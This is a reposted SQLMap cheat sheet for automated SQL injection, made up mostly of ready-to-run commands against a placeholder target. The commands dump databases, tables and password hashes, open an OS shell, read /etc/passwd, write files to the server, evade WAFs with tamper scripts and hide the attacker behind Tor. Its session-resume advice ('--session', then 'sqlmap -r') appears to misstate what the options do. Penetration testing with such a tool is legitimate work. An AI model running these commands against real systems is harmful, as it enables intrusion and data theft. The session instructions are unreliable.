Home > Backend Development > Python Tutorial > SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Linda Hamilton
Release: 2024-09-26 15:30:02
Original
989 people have browsed it

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Author: Trix Cyrus

What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and more.

Basic Usage
To start with SQLMap, you can run it in its simplest form by providing the target URL:

sqlmap -u "http://example.com/index.php?id=1"
Copy after login

This command scans the target URL for SQL injection vulnerabilities.

1. Detecting Vulnerabilities
Use the following options to perform a basic vulnerability scan and automatically detect SQL injection points:

sqlmap -u "http://example.com/index.php?id=1" --dbs
Copy after login
Copy after login

--dbs: Lists all available databases on the target server if a vulnerability is found.

2. Specifying POST Requests

For targets that require a POST request (usually in login forms), you can specify the data like this:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
Copy after login

3. Bypassing WAFs and Filters

To evade Web Application Firewalls (WAFs), SQLMap includes payload obfuscation techniques:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
Copy after login

--tamper: Uses tamper scripts to evade filters. Example: space2comment, charencode.

4. Extracting Databases, Tables, and Columns
To get a list of databases on the target system:

sqlmap -u "http://example.com/index.php?id=1" --dbs
Copy after login
Copy after login

Once a database is identified, extract its tables:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
Copy after login

To get columns from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
Copy after login

5. Dumping Data

Dumping the contents of a table is one of the most useful features of SQLMap. For example, to dump all data from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
Copy after login

6. Enumerating Database Users and Passwords

SQLMap can also be used to enumerate database users and even crack hashed passwords:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords
Copy after login

7. Accessing the Operating System

In some cases, SQLMap can be used to execute commands on the operating system, especially when the database user has high-level privileges:

sqlmap -u "http://example.com/index.php?id=1" --os-shell
Copy after login

This will provide an interactive shell where you can execute commands on the target system.

8. File Upload and Reading

You can also read files from the target system or upload malicious files (if permitted):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
Copy after login

9. Using Tor for Anonymity

To hide your identity, you can run SQLMap through the Tor network:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
Copy after login

--tor: Enables Tor.
--check-tor: Verifies if the connection is made through Tor.

10. Saving and Resuming Sessions

SQLMap allows you to save and resume your progress by using the --session option:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
Copy after login

Later, you can resume the same session by:

sqlmap -r your_session_name
Copy after login

11. Verbose Mode

To see detailed information about what SQLMap is doing:

sqlmap -u "http://example.com/index.php?id=1" -v 3
Copy after login

The -v option controls verbosity (levels from 0 to 6, where 6 shows all details).

  1. Automated Scans for Multiple Targets

SQLMap supports scanning multiple URLs stored in a file:

sqlmap -m urls.txt --batch
Copy after login

--batch: Automatically answer all prompts with default options, useful for automated scanning.

also use --risk=3 and --level=5 to advance scanning
You can use this cheat sheet to introduce readers to the essential commands of SQLMap and help them get started with SQL injection testing.

~TrixSec

The above is the detailed content of SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection. For more information, please follow other related articles on the PHP Chinese website!

source:dev.to
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template